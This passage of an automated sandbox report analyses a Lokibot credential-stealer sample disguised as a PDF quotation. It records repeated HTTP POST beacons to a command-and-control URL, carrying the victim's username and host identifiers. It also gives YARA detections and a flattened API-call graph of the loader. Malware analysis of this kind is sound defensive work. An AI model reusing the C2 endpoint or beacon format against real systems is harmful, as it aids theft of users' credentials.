              Session IDSource IPSource PortDestination IPDestination PortProcess
              50192.168.2.349861104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:54:28.746130943 CET10350OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:28.882826090 CET10351OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:54:29.017143965 CET10351INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:27 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              51192.168.2.349862104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:54:30.197088957 CET10352OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:30.321491957 CET10352OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:54:30.453828096 CET10352INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:29 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              52192.168.2.349863104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:54:31.498490095 CET10353OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:31.621882915 CET10353OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:54:31.754610062 CET10354INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:30 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              53192.168.2.349864104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:54:32.828735113 CET10355OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:32.953716993 CET10355OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:54:33.107048988 CET10355INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:32 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              54192.168.2.349865104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:54:34.246263981 CET10356OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:34.371715069 CET10356OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:54:34.502947092 CET10357INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:33 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              55192.168.2.349866104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:54:35.583282948 CET10357OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:35.705868959 CET10358OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:54:35.838768005 CET10358INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:34 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              6192.168.2.349748104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:52:48.938221931 CET1113OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:52:49.060915947 CET1113OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:52:49.243886948 CET1113INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:52:48 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              7192.168.2.349749104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:52:50.316401958 CET1114OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:52:50.509278059 CET1115OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:52:50.639916897 CET1115INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:52:49 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              8192.168.2.349750104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:52:51.814681053 CET1116OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:52:51.939326048 CET1116OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:52:52.091804981 CET1116INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:52:51 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              9192.168.2.349751104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:52:53.249068975 CET1117OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:52:53.402760029 CET1117OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:52:53.547552109 CET1118INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:52:52 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Code Manipulations

              Statistics

              CPU Usage

              Click to jump to process

              Memory Usage

              Click to jump to process

              High Level Behavior Distribution

              Click to dive into process behavior distribution

              Behavior

              Click to jump to process

              System Behavior

              Analysis Process: QUOTAZIONEpdf.exe PID: 6352 Parent PID: 5328

              General

              Start time:09:52:29
              Start date:14/01/2022
              Path:C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\QUOTAZIONEpdf.exe"
              Imagebase:0x400000
              File size:250601 bytes
              MD5 hash:23B85C2F43B23B57411E4F4366A10B25
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, Author: kevoreilly
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              Reputation:low

              Chronological Activities

              Analysis Process: QUOTAZIONEpdf.exe PID: 808 Parent PID: 6352

              General

              Start time:09:52:31
              Start date:14/01/2022
              Path:C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\QUOTAZIONEpdf.exe"
              Imagebase:0x400000
              File size:250601 bytes
              MD5 hash:23B85C2F43B23B57411E4F4366A10B25
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000002.00000003.316877844.0000000000533000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
              • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, Author: kevoreilly
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000002.00000002.556036179.0000000000518000.00000004.00000020.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              Reputation:low

              Chronological Activities

              Disassembly

              Code Analysis

              Reset < >

                Analysis Process: QUOTAZIONEpdf.exe PID: 6352 Parent PID: 5328 QUOTAZIONEpdf.exeCOMMON

                Execution Graph

                Execution Coverage:11.9%
                Dynamic/Decrypted Code Coverage:6.1%
                Signature Coverage:22.2%
                Total number of Nodes:1336
                Total number of Limit Nodes:25

                Graph

                execution_graph 3914 401cc1 GetDlgItem GetClientRect 3915 4029e8 18 API calls 3914->3915 3916 401cf1 LoadImageA SendMessageA 3915->3916 3917 40287d 3916->3917 3918 401d0f DeleteObject 3916->3918 3918->3917 3919 401dc1 3920 4029e8 18 API calls 3919->3920 3921 401dc7 3920->3921 3922 4029e8 18 API calls 3921->3922 3923 401dd0 3922->3923 3924 4029e8 18 API calls 3923->3924 3925 401dd9 3924->3925 3926 4029e8 18 API calls 3925->3926 3927 401de2 3926->3927 3928 401423 25 API calls 3927->3928 3929 401de9 ShellExecuteA 3928->3929 3930 401e16 3929->3930 3931 401ec5 3932 4029e8 18 API calls 3931->3932 3933 401ecc GetFileVersionInfoSizeA 3932->3933 3934 401f45 3933->3934 3935 401eef GlobalAlloc 3933->3935 3935->3934 3936 401f03 GetFileVersionInfoA 3935->3936 3936->3934 3937 401f14 VerQueryValueA 3936->3937 3937->3934 3938 401f2d 3937->3938 3942 4059e3 wsprintfA 3938->3942 3940 401f39 3943 4059e3 wsprintfA 3940->3943 3942->3940 3943->3934 3944 4014ca 3945 404e23 25 API calls 3944->3945 3946 4014d1 3945->3946 3947 403f4b lstrcpynA lstrlenA 3948 40604c 3952 405ed0 3948->3952 3949 40683b 3950 405f51 GlobalFree 3951 405f5a GlobalAlloc 3950->3951 3951->3949 3951->3952 3952->3949 3952->3950 3952->3951 3953 405fd1 GlobalAlloc 3952->3953 3954 405fc8 GlobalFree 3952->3954 3953->3949 3953->3952 3954->3953 3350 401f51 3351 401f63 3350->3351 3352 402004 3350->3352 3371 4029e8 3351->3371 3354 401423 25 API calls 3352->3354 3361 40215b 3354->3361 3356 4029e8 18 API calls 3357 401f73 3356->3357 3358 401f88 LoadLibraryExA 3357->3358 3359 401f7b GetModuleHandleA 3357->3359 3358->3352 3360 401f98 GetProcAddress 3358->3360 3359->3358 3359->3360 3362 401fe5 3360->3362 3363 401fa8 3360->3363 3386 404e23 3362->3386 3364 401fb0 3363->3364 3365 401fc7 3363->3365 3383 401423 3364->3383 3377 72fb10a0 3365->3377 3368 401fb8 3368->3361 3369 401ff8 FreeLibrary 3368->3369 3369->3361 3372 4029f4 3371->3372 3397 405aa7 3372->3397 3375 401f6a 3375->3356 3437 72fb1000 3377->3437 3379 72fb10ad GetTempPathW 3439 72fb1030 3379->3439 3382 72fb118d 3382->3368 3384 404e23 25 API calls 3383->3384 3385 401431 3384->3385 3385->3368 3387 404ee1 3386->3387 3388 404e3e 3386->3388 3387->3368 3389 404e5b lstrlenA 3388->3389 3390 405aa7 18 API calls 3388->3390 3391 404e84 3389->3391 3392 404e69 lstrlenA 3389->3392 3390->3389 3394 404e97 3391->3394 3395 404e8a SetWindowTextA 3391->3395 3392->3387 3393 404e7b lstrcatA 3392->3393 3393->3391 3394->3387 3396 404e9d SendMessageA SendMessageA SendMessageA 3394->3396 3395->3394 3396->3387 3398 405ab4 3397->3398 3399 405cca 3398->3399 3402 405b48 GetVersion 3398->3402 3403 405ca1 lstrlenA 3398->3403 3404 405aa7 10 API calls 3398->3404 3410 405ce3 5 API calls 3398->3410 3430 4059e3 wsprintfA 3398->3430 3431 405a85 lstrcpynA 3398->3431 3400 402a15 3399->3400 3432 405a85 lstrcpynA 3399->3432 3400->3375 3416 405ce3 3400->3416 3414 405b55 3402->3414 3403->3398 3404->3403 3408 405bc0 GetSystemDirectoryA 3408->3414 3409 405bd3 GetWindowsDirectoryA 3409->3414 3410->3398 3411 405aa7 10 API calls 3411->3414 3412 405c4a lstrcatA 3412->3398 3413 405c07 SHGetSpecialFolderLocation 3413->3414 3415 405c1f SHGetPathFromIDListA CoTaskMemFree 3413->3415 3414->3398 3414->3408 3414->3409 3414->3411 3414->3412 3414->3413 3425 40596c RegOpenKeyExA 3414->3425 3415->3414 3422 405cef 3416->3422 3417 405d57 3418 405d5b CharPrevA 3417->3418 3421 405d76 3417->3421 3418->3417 3419 405d4c CharNextA 3419->3417 3419->3422 3421->3375 3422->3417 3422->3419 3423 405d3a CharNextA 3422->3423 3424 405d47 CharNextA 3422->3424 3433 4055a3 3422->3433 3423->3422 3424->3419 3426 4059dd 3425->3426 3427 40599f RegQueryValueExA 3425->3427 3426->3414 3428 4059c0 RegCloseKey 3427->3428 3428->3426 3430->3398 3431->3398 3432->3400 3434 4055a9 3433->3434 3435 4055bc 3434->3435 3436 4055af CharNextA 3434->3436 3435->3422 3436->3434 3438 72fb100c 3437->3438 3438->3379 3438->3438 3440 72fb1045 VirtualProtect CreateFileW ReadFile 3439->3440 3440->3382 3962 4014d6 3967 4029cb 3962->3967 3964 4014dc Sleep 3966 40287d 3964->3966 3968 405aa7 18 API calls 3967->3968 3969 4029df 3968->3969 3969->3964 3975 402858 SendMessageA 3976 402872 InvalidateRect 3975->3976 3977 40287d 3975->3977 3976->3977 3978 4018d8 3979 40190f 3978->3979 3980 4029e8 18 API calls 3979->3980 3981 401914 3980->3981 3982 4053aa 68 API calls 3981->3982 3983 40191d 3982->3983 3984 402259 3985 4029e8 18 API calls 3984->3985 3986 402267 3985->3986 3987 4029e8 18 API calls 3986->3987 3988 402270 3987->3988 3989 4029e8 18 API calls 3988->3989 3990 40227a GetPrivateProfileStringA 3989->3990 3991 40155b 3992 401577 ShowWindow 3991->3992 3993 40157e 3991->3993 3992->3993 3994 40158c ShowWindow 3993->3994 3995 40287d 3993->3995 3994->3995 3996 4018db 3997 4029e8 18 API calls 3996->3997 3998 4018e2 3997->3998 3999 405346 MessageBoxIndirectA 3998->3999 4000 4018eb 3999->4000 4001 404f61 4002 404f82 GetDlgItem GetDlgItem GetDlgItem 4001->4002 4003 40510d 4001->4003 4047 403e6c SendMessageA 4002->4047 4004 405116 GetDlgItem CreateThread CloseHandle 4003->4004 4005 40513e 4003->4005 4004->4005 4007 405169 4005->4007 4009 405155 ShowWindow ShowWindow 4005->4009 4010 40518b 4005->4010 4011 4051c7 4007->4011 4014 4051a0 ShowWindow 4007->4014 4015 40517a 4007->4015 4008 404ff3 4012 404ffa GetClientRect GetSystemMetrics SendMessageA SendMessageA 4008->4012 4052 403e6c SendMessageA 4009->4052 4056 403e9e 4010->4056 4011->4010 4019 4051d2 SendMessageA 4011->4019 4017 405069 4012->4017 4018 40504d SendMessageA SendMessageA 4012->4018 4022 4051c0 4014->4022 4023 4051b2 4014->4023 4053 403e10 4015->4053 4025 40507c 4017->4025 4026 40506e SendMessageA 4017->4026 4018->4017 4021 405199 4019->4021 4027 4051eb CreatePopupMenu 4019->4027 4024 403e10 SendMessageA 4022->4024 4028 404e23 25 API calls 4023->4028 4024->4011 4048 403e37 4025->4048 4026->4025 4029 405aa7 18 API calls 4027->4029 4028->4022 4031 4051fb AppendMenuA 4029->4031 4033 405221 4031->4033 4034 40520e GetWindowRect 4031->4034 4032 40508c 4035 405095 ShowWindow 4032->4035 4036 4050c9 GetDlgItem SendMessageA 4032->4036 4037 40522a TrackPopupMenu 4033->4037 4034->4037 4038 4050b8 4035->4038 4039 4050ab ShowWindow 4035->4039 4036->4021 4040 4050f0 SendMessageA SendMessageA 4036->4040 4037->4021 4041 405248 4037->4041 4051 403e6c SendMessageA 4038->4051 4039->4038 4040->4021 4042 405264 SendMessageA 4041->4042 4042->4042 4044 405281 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4042->4044 4045 4052a3 SendMessageA 4044->4045 4045->4045 4046 4052c4 GlobalUnlock SetClipboardData CloseClipboard 4045->4046 4046->4021 4047->4008 4049 405aa7 18 API calls 4048->4049 4050 403e42 SetDlgItemTextA 4049->4050 4050->4032 4051->4036 4052->4007 4054 403e17 4053->4054 4055 403e1d SendMessageA 4053->4055 4054->4055 4055->4010 4057 403eb6 GetWindowLongA 4056->4057 4067 403f3f 4056->4067 4058 403ec7 4057->4058 4057->4067 4059 403ed6 GetSysColor 4058->4059 4060 403ed9 4058->4060 4059->4060 4061 403ee9 SetBkMode 4060->4061 4062 403edf SetTextColor 4060->4062 4063 403f01 GetSysColor 4061->4063 4064 403f07 4061->4064 4062->4061 4063->4064 4065 403f18 4064->4065 4066 403f0e SetBkColor 4064->4066 4065->4067 4068 403f32 CreateBrushIndirect 4065->4068 4069 403f2b DeleteObject 4065->4069 4066->4065 4067->4021 4068->4067 4069->4068 4070 403964 4071 403ab7 4070->4071 4072 40397c 4070->4072 4074 403b08 4071->4074 4075 403ac8 GetDlgItem GetDlgItem 4071->4075 4072->4071 4073 403988 4072->4073 4076 403993 SetWindowPos 4073->4076 4077 4039a6 4073->4077 4079 403b62 4074->4079 4084 401389 2 API calls 